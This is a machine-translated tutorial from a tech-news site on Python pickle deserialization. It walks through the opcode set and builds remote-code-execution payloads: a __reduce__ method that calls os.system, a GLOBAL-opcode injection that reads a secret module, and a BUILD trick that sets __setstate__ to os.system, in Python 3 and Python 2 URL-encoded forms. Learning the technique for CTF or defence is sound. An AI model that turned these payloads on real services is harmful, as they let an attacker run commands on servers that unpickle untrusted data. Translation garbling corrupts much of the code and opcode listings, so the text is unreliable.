Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Detailed introduction of pickle deserialization in Python

2025-10-26 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

This article mainly explains the "detailed introduction to pickle deserialization in Python". The content in the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "the detailed introduction of pickle deserialization in Python".

What is Python deserialization

Python deserialization is similar to php deserialization (I haven't touched java yet. ), which is equivalent to transforming variables, dictionaries, object instances, etc. generated by the program at run time into a string for subsequent calls to restore the pre-saved state

There are two main deserialization libraries in python, pickle and cPickle, which are not different except for their running efficiency.

The common methods of pickle are

Import picklea_list = ['a string constructed by pickle. There are many versions of it. In dumps or loads, you can specify the version of the protocol with the Protocol parameter, for example, it is specified as version 0. Currently, these protocols have version 0, 2, 3, and 4, and default is version 3. Of all these editions, version 0 is the most human-readable; later versions have added a lot of unprintable characters, but these additions are only for optimization and are essentially unchanged. The good news is that the pickle protocol is forward compatible. The string of version 0 can be passed directly to pickle.loads () without worrying about causing any accident. # pickle.dumps deserializes the object into a string # pickle.dump stores the deserialized string as a file print (pickle.dumps (axiList) pickle.loads () # object deserialization pickle.load () # object deserialization to read data from the file

Output deserialization

Read deserialization

As you can see, there are some differences in deserialization results between python2 and python3. We first focus on the current supported version of python3, and then add python2 when we give exp later.

The default version of deserialized string in most versions of python3 is version 3, and the default version of python3.8 here is 4.

The v0 version is the original "human readable" protocol and is backward compatible with earlier versions of Python. The v1 version of the protocol is an earlier binary format and is also compatible with earlier versions of Python. The v2 version of the protocol was introduced in Python 2.3. It provides a more efficient mechanism for storing new-style class. For more information about the improvements brought about by the version 2 protocol, see PEP 307. The v3 version of the protocol is added to Python 3.0. It has explicit support for bytes objects and cannot be opened by Python 2.x. This is the protocol currently used by default and is recommended when compatibility with other Python 3 versions is required. The v4 version of the protocol is added to Python 3.4. It supports the storage of very large objects, can store more kinds of objects, and includes some optimizations for data formats. For information about the improvements brought about by the version 4 protocol, see PEP 3154.

In order to facilitate analysis and compatibility, we uniformly use version 3

C:\ Users\ Rayi\ Desktop\ Tmp\ Script λ python 1.pyb' (lp0\ nVa\ np1\ naVb\ np2\ naVc\ np3\ na.' # 0 b'\ x80\ x03] Q\ x00 (X\ X01\ X00\ x00aq\ x01X\ X01\ X00\ x00bq\ x02X\ X00\ x00cq\ x03e.' 3 b'\ X80\ X04\ x95\ X11\ X00\ X00]\ X94 (\ X8c\ x01a) Analysis of deserialization process of x94\ x8c\ x01b\ x94\ x8c\ x01c\ x94e.'#4

Before exploiting deserialization vulnerabilities, we need to understand the process of python deserialization

It is difficult to analyze deserialized strings directly. We can use pickletools to help us analyze them.

Import pickleimport pickletoolsa_list = ['axiaxiaolongjiezhongc'] a_list_pickle = pickle.dumps (axiaListList Novel0) print (a_list_pickle) # optimize a packaged string a_list_pickle = pickletools.optimize (a_list_pickle) print (a_list_pickle) # disassemble a packaged string pickletools.dis (a_list_pickle)

The instruction set is as follows: (for more specific parsing, please see pickletools.py)

MARK = b' ('# push special markobject on stackSTOP = baked.'# every pickle ends with STOPPOP = baked 0' # discard topmost stack itemPOP_MARK = baked 1' # discard stack top through topmost markobjectDUP = baked 2' # duplicate top stack itemFLOAT = baked F' # push float object; decimal string argumentINT = baked I'# push integer or bool Decimal string argumentBININT = baked J' # push four-byte signed intBININT1 = baked K' # push 1-byte unsigned intLONG = bounded L' # push long; decimal string argumentBININT2 = baked M' # push 2-byte unsigned intNONE = bounded N' # push NonePERSID = baked P' # push persistent object Id is taken from string argBINPERSID = bounded Q' # ";" stackREDUCE = bounded R' # apply callable to argtuple, both on stackSTRING = baked S' # push string; NL-terminated string argumentBINSTRING = baked T' # push string; counted binary string argumentSHORT_BINSTRING= bounded U' # " "< 256 bytesUNICODE = bounded V' # push Unicode string; raw-unicode-escaped'd argumentBINUNICODE = baked X' #" Counted UTF-8 string argumentAPPEND = breada' # append stack top to list below itBUILD = breadb' # call _ _ setstate__ or _ _ dict__.update () GLOBAL = bounc' # push self.find_class (modname, name) 2 string argsDICT = bounded d' # build a dict from stack itemsEMPTY_DICT = b'}'# push empty dictAPPENDS = broome' # extend list on stack by topmost stack sliceGET = breadg' # push item from memo on stack; index is string argBINGET = bounded h' # " "" 1-byte argINST = bounded i' # build & push class instanceLONG_BINGET = bounded j' # push item from memo on stack; index is 4-byte argLIST = bounded l' # build list from topmost stack itemsEMPTY_LIST = b']'# push empty listOBJ = bicono' # build & push class instancePUT = bounded p' # store stack top in memo Index is string argBINPUT = bounded q' # ";"1-byte argLONG_BINPUT = bounded r' #" "" 4-byte argSETITEM = breads' # add key+value pair to dictTUPLE = breadt' # build tuple from topmost stack itemsEMPTY_TUPLE = b')'# push empty tupleSETITEMS = bounu' # modify dict by adding topmost key+value pairsBINFLOAT = baked G' # push float; arg is 8-byte float encodingTRUE = b'I01\ n' # not an opcode See INT docs in pickletools.pyFALSE = b'I00\ n'# not an opcode; see INT docs in pickletools.py

According to the table above, this serialization example is easy to understand.

B'\ x80\ x03] (X\ X01\ X00\ X00\ x00aX\ X01\ X00\ X00\ x00bX\ X01\ X00\ X00\ x00ce.0:\ x80 PROTO 3 # indicates the use of protocol version 2:] EMPTY_LIST # to push the empty list onto stack 3: (MARK # push the flag onto stack 4: X BINUNICODE 'a' # unicode character 10: X BINUNICODE 'b' 16: X BINUNICODE 'c' 22: e APPENDS (MARK at 3) # Press the data after mark 3 into the list # data in the pop-up stack End process 23:. STOPhighest protocol among opcodes = 2

Let's take a look at another more complex example.

Import pickleimport pickletoolsimport base64class a_class (): def _ init__ (self): self.age = 114514 self.name = "QAQ" self.list = ["1919", "810", "qwq"] a_class_new = a_class () a_class_pickle = pickle.dumps (a_class_new Protocol=3) print (a_class_pickle) # optimize a packaged string a_list_pickle = pickletools.optimize (a_class_pickle) print (a_class_pickle) # disassemble a packaged string pickletools.dis (a_class_pickle) b'\ x80\ x03ccommodity maintainable _\ na_class\ nq\ X00)\ x81q\ X01} Q\ X02 (X\ X03\ X00\ X00\ x00ageq\ x03JR\ xbf\ X01\ X00X\ X04\ X00\ X00\ x00nameq\ x04X\ X03\ X00\ X00\ x00QAQq\ x05X\ X04\ X00\ X00\ x00listq\ X06] Q\ x07 (X\ X04\ X00\ X00\ x0019q\ x08X\ X03\ X00\ X00\ x00810q\ tX\ X03\ X00\ X00\ neub.'b'\ x80\ x03ccargo mainstay _\ na_class\ nq\ X00)\ x81q\ X01} Q\ X02 (X\ X03\ X00\ x00ageq\ x03JR\ xbf\ x00X\ x04\ X00 X00\ x00nameq\ x03\ X00\ X00\ x00QAQq\ x05X\ x04\ X00\ X00\ x00listq\ X06] Q\ x07 (X\ X04\ X00\ x0019q\ x08X\ X03\ X00\ X00\ x00810q\ X03\ X00\ x00qwqq\ neub.' 0:\ X80 PROTO 3 # push self.find_class (modname) Name) Read two strings as parameters in succession, bounded by\ nThis is self.find_class ('_ main__','a string class') # the version that needs to be noted is different, and the find_class function is also different. 2: C GLOBAL'_ main__ axiom class' # does not affect deserialization 20: Q BINPUT 0 # push a tuple into the stack 22:) EMPTY_TUPLE # see line 2097 of the pickletools source code (note version) # to the effect The stack content before the instruction should be a class (a class created by 2 lines GLOBAL), followed by a tuple (22-line pressed TUPLE), calling cls.__new__ (cls, * args) (that is, creating an instance with the parameters in the tuple Here the tuple is actually empty) 23:\ x81 NEWOBJ 24: Q BINPUT 1 # press a new dictionary 26:} EMPTY_DICT 27: Q BINPUT 2 # A flag 29: (MARK # press the unicode value 30: X BINUNICODE 'age' 38: Q BINPUT 3 40: J BININT 114514 45: X BINUNICODE' name '54: Q BINPUT 4 56: X BINUNICODE' QAQ' 64: Q BINPUT 566: X BINUNICODE 'list' 75: Q BINPUT 6 77:] EMPTY_LIST 78: Q BINPUT 7 # another logo 80: (MARK 81: X BINUNICODE' 1919'90: Q BINPUT 8 92: X BINUNICODE '810100: Q BINPUT 9 102: X BINUNICODE' qwq' 110: Q BINPUT 10 # Press the value after the mark on line 80 into the list on line 77: e APPENDS (MARK at 80) # for details, see line 1674 of the pickletools source code (note version) # to the effect that any number Add key-value pairs of quantity to the existing dictionary # Stack before:... Pydict markobject key_1 value_1... Key_n value_n # Stack after:... Pydict 113u SETITEMS (MARK at 29) # builds the object through _ _ setstate__ or update _ _ dict__ (the object we created at line 23). # if the object has a _ _ setstate__ method, call anyobject.__ setstate__ (parameter) # if there is no _ _ setstate__ method, update the value through anyobject.__dict__.update (argument) # Note that variables may be generated here to overwrite the data in the pop-up stack of 114b BUILD #, ending the process 115:. STOPhighest protocol among opcodes = 2

In this way, another more complex example is completed.

We now have a general understanding of the process of serialization and deserialization

Vulnerability Analysis RCE: commonly used _ _ reduce__

Most of the common pickle deserialization in ctf is used by _ _ reduce__

The instruction code to trigger _ _ reduce__ is R

# pickletools.py 1955 line name='REDUCE', code='R', arg=None, stack_before= [anyobject, anyobject], stack_after= [anyobject], proto=0, doc= "" Push an object built from a callable and an argument tuple. The opcode is named to remind of the _ reduce__ () method. Stack before:... Callable pytuple Stack after:... Callable (* pytuple) The callable and the argument tuple are the first two items returned by a _ _ reduce__ method. Applying the callable to the argtuple is supposed to reproduce the original object, or at least get it started. If the _ _ reduce__ method returns a 3-tuple, the last component is an argument to be passed to the object's _ _ setstate__, and then the REDUCE opcode is followed by code to create setstate's argument, and then a BUILD opcode to apply _ _ setstate__ to that argument. If not isinstance (callable, type), REDUCE complains unless the callable has been registered with the copyreg module's safe_constructors dict, or the callable has a magic'_ safe_for_unpickling__' attribute with a true value. I'm not sure why it does this, but I've sure seen this complaint often enough when I didn't want to. "

To the effect that:

Take the top of the current stack as args, and then pop it off.

Take the top of the current stack as f, and then bounce it off.

Execute the function f with args as an argument, pushing the result onto the current stack.

The _ _ reduce__ method is executed as long as there is an R instruction in the serialized string, regardless of whether the _ _ reduce__ method is specified in the normal program

For example:

Import pickleimport pickletoolsimport base64class a_class (): def _ init__ (self): self.age = 114514 self.name = "QAQ" self.list = ["1919", "810", "qwq"] def _ reduce__ (self): return (_ import__ ('os'). System, ("whoami") ) a_class_new = a_class () a_class_pickle = pickle.dumps (a_class_new Protocol=3) print (a_class_pickle) # optimize a packaged string a_list_pickle = pickletools.optimize (a_class_pickle) print (a_class_pickle) # disassemble a packaged string pickletools.dis (a_class_pickle)''B'\ X80\ x03cnt\ nsystem\ nq\ X00X\ X06\ X00\ x00whoamiq\ X01\ X85q\ x02Rq\ x03.roomb'\ x80\ x03cnt\ nsystem\ x00X \ x06\ X00\ X00\ x00whoamiq\ X01\ X85q\ x02Rq\ x03.' 0:\ x80 PROTO 32: C GLOBAL'nt system' 13: Q BINPUT 0 15: X BINUNICODE 'whoami' 26: Q BINPUT 1 28:\ x85 TUPLE1 29: Q BINPUT 2 31: r REDUCE 32: Q BINPUT 3 34:. STOPhighest protocol among opcodes = 2 million'

Take the generated payload to a normal program without _ _ reduce__, and the command will still be executed

Remember to generate payload using the python version that matches the target version as much as possible

# coding=utf-8import pickleimport urllib.request#python2#import urllibimport base64class rayi (object): def _ _ reduce__ (self): # os module is not imported General return (_ _ import__ ('os'). System, ("whoami",)) # return eval, ("_ _ import__ (' os'). System ('whoami')",) # return map, (_ _ import__ (' os'). System, ('whoami',)) # return map, (_ _ import__ (' os'). System ['whoami']) # Import os module # return (os.system, (' whoami',)) # return eval, ("os.system ('whoami')",) # return map, (os.system, (' whoami',)) # return map, (os.system ['whoami']) a_class = rayi () result = pickle.dumps (a_class) print (result) print (base64.b64encode (result)) # python3print (urllib.request.quote (result)) # python2#print urllib.quote (result) global variable contains override: C script

The first two examples begin with a c instruction code

Name='GLOBAL', code='c', arg=stringnl_noescape_pair, stack_before= [], stack_after= [anyobject], proto=0, doc= "" Push a global object (module.attr) on the stack. Two newline-terminated strings follow the GLOBAL opcode. The first is taken as a module name, and the second as a class name. The class object module.class is pushed on the stack. More accurately, the object returned by self.find_class (module, class) is pushed on the stack, so unpickling subclasses can override this form of lookup. "

Simply put, the c script can be used to call the value of the global xxx.xxx

Look at the following example

Import secretimport pickleimport pickletoolsclass flag (): def _ init__ (self,a,b): self.a = a self.b = b # new_flag = pickle.dumps (flag ('Achilles Magnum B'), protocol=3) # print (new_flag) # pickletools.dis (new_flag) your_payload = b'?'other_flag = pickle.loads (your_payload) secret_flag = flag (secret.a Secret.b) if other_flag.a = = secret_flag.an and other_flag.b = = secret_flag.b: print ('flag {xxxxxx}') else: print ('Notification') # secret.py# you can not see thisa = 'aaaa'b =' bbbb'

If we don't know the median value of secret.py, how can we construct a payload that satisfies the conditions and get the flag?

Using the c instruction:

This is the flag class in general

λ python app.pyb'\ x80\ x03c mainstay _\ nflag\ nq\ X00)\ x81q\ X01} Q\ X02 (X\ X01\ X00\ X00\ x00aq\ X03X\ X01\ X00\ X00\ x00Aq\ X04X\ X01\ X00\ x00bq\ X05X\ X01\ X00\ x00Bq\ x06ub.0:\ x80 PROTO 3 2: C GLOBAL'_ main__ flag' 17: Q BINPUT 0 19:) EMPTY_TUPLE 20:\ x81 NEWOBJ 21: Q BINPUT 1 23:} EMPTY_DICT 24: Q BINPUT 2 26: (MARK 27: X BINUNICODE'a'33: Q BINPUT 3 35: X BINUNICODE'A'41: Q BINPUT 4 43: X BINUNICODE 'b' 49: Q BINPUT 5 51: X BINUNICODE'B' 57: Q BINPUT 6 59: U SETITEMS (MARK at 26) 60: B BUILD 61:. STOPhighest protocol among opcodes = 2

Lines 27 and 37 pass parameters, respectively. If we modify payload manually, change the values of an and b to secret.a,secret.b

Original: B'\ x80\ x03c mainstay _\ nflag\ nq\ X00)\ x81q\ X01} Q\ X02 (X\ X01\ X00\ x00aq\ X03X\ X01\ X00\ X00\ x00Aq\ X04X\ X01\ X00\ x00bq\ X05X\ X01\ X00\ x00Bq\ x06ub.' Now: B'\ x80\ x03c mainstay _\ nflag\ nq\ X00)\ x81q\ X01} Q\ X02 (X\ X01\ X00\ x00aq\ x03csecret\ na\ nq\ X01\ X00\ x00bq\ x05csecret\ nb\ nq\ x06ub.'

We successfully called the variables in secret.py

RCE:BUILD instruction

Remember the build instruction code I just said?

Name='BUILD', code='b', arg=None, stack_before= [anyobject, anyobject], stack_after= [anyobject], proto=0, doc= "Finish building an object, via _ _ setstate__ or dict update. Stack before:... Anyobject argument Stack after:... Anyobject where anyobject may have been mutated, as follows: If the object has a _ setstate__ method, anyobject.__setstate__ (argument) is called. Else the argument must be a dict, the object must have a _ _ dict__, and the object is updated via anyobject.__dict__.update (argument)

Through the combination of BUILD instruction and C instruction, we can rewrite it to os.system or other functions.

Assuming that a class does not previously have a _ _ setstate__ method, we can use {'_ setstate__': os.system} to BUILE this object

When the BUILD instruction is executed, the update is executed because there is no _ _ setstate__ method, and the _ _ setstate__ method of this object is changed to the os.system we specified.

Then using "ls /" to BUILD the object again, setstate ("ls /") will be executed, and at this time _ _ setstate__ has been set to os.system, so we have implemented RCE.

Take a look at how it is achieved:

Or take the cymbals as an example.

Import pickleimport pickletoolsclass flag (): def _ _ init__ (self): passnew_flag = pickle.dumps (flag () Protocol=3) print (new_flag) pickletools.dis (new_flag) # your_payload = baked bones # other_flag = pickle.loads (your_payload) λ python app.pyb'\ x80\ x03cregions mainstay _\ nflag\ nq\ X00)\ x81q\ x01.' 0:\ x80 PROTO 3 2: C GLOBAL'_ main__ flag' 17: Q BINPUT 0 19:) EMPTY_TUPLE 20:\ x81 NEWOBJ 21: q BINPUT 1 23:. STOPhighest protocol among opcodes = 2

Next we need to tear the payload by hand.

According to BUILD's instructions, we need to construct a dictionary

B'\ x80\ x03cThe mainstay _\ nflag\ nq\ x00)\ x81}.'

Next, put the value in the dictionary and put a mark first.

B'\ x80\ x03cThe mainstay _\ nflag\ nq\ x00)\ x81} (.'

Key release value pair

B'\ x80\ x03cregions maintainable _\ nflag\ nq\ X00)\ x81} (Veterinary setstatestates _\ ncos\ nsystem\ nu.'

The first BUILD

B'\ x80\ x03cregions maintainable _\ nflag\ nq\ X00)\ x81} (Veterinary setstatestates _\ ncos\ nsystem\ nub.'

Release parameter

B'\ x80\ x03cregions maintainable _\ nflag\ nq\ x00)\ x81} (Veterinary setstatestates _\ ncos\ nsystem\ nubVwhoami\ n.'

The second BUILD

B'\ x80\ x03c maintainable _\ nflag\ nq\ X00)\ x81} (Variety setting statehood _\ ncos\ nsystem\ nubVwhoami\ nb.'

Complete

Let's try it.

Yes, we completed the RCE without using the R instruction.

Rayi-de-shenchu\ rayi 0:\ x80 PROTO 3 2: C GLOBAL'_ main__ flag' 17: Q BINPUT 0 19:) EMPTY_TUPLE 20:\ x81 NEWOBJ 21:} EMPTY_DICT 22: (MARK 23: v UNICODE'_ setstate__' 37: C GLOBAL'os system' 48: U SETITEMS (MARK at) 22) 49: B BUILD 50: v UNICODE 'whoami' 58: B BUILD 59:. STOPhighest protocol among opcodes = 2 [Finished in 0.2s]

There is not much difference in python2:

Import pickleimport pickletoolsimport urllibclass rayi (): def _ _ init__ (self): passnew_rayi = pickle.dumps (rayi (), protocol=2) print (urllib.quote (new_rayi)) pickletools.dis (new_rayi) # your_payload ='\ x80\ x03 cantilever mainstay _\ nrayi\ nq\ x00)\ x81} (Variety setting statehood _\ ncos\ nsystem\ nubVwhoami\ nb.'# other_rayi = pickle.loads (your_payload) # pickletools.dis (your_payload))

Output:

% 80%28c__main__%0Arayi%0Aqoq%7Dqb. 0:\ x80 PROTO 2 2: (MARK 3: C GLOBAL'_ main__ rayi' 18: Q BINPUT 0 20: o OBJ (MARK at 2) 21: Q BINPUT 1 23:} EMPTY_DICT 24: Q BINPUT 2 26: B BUILD 27:. STOPhighest protocol among opcodes = 2 [Finished in 0.1s]

Modify payload:

% 80%28c__main__%0Arayi%0Aqoq%7Dq (Veterinary setstatestates _\ ncos\ nsystem\ nubVwhoami\ nb.import pickleimport pickletoolsimport urllibclass rayi (): def _ _ init__ (self): pass# new_rayi = pickle.dumps (rayi ()) Protocol=2) # print (urllib.quote (new_rayi)) # pickletools.dis (new_rayi) your_payload = urllib.unquote ('% 80%28c__main__%0Arayi%0Aqoq%7Dq (ncos\ nsystem\ nubVwhoami\ nb.') other_rayi = pickle.loads (your_payload) pickletools.dis (your_payload))

Thank you for reading, the above is the content of "detailed introduction of pickle deserialization in Python". After the study of this article, I believe you have a deeper understanding of the detailed introduction of pickle deserialization in Python, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report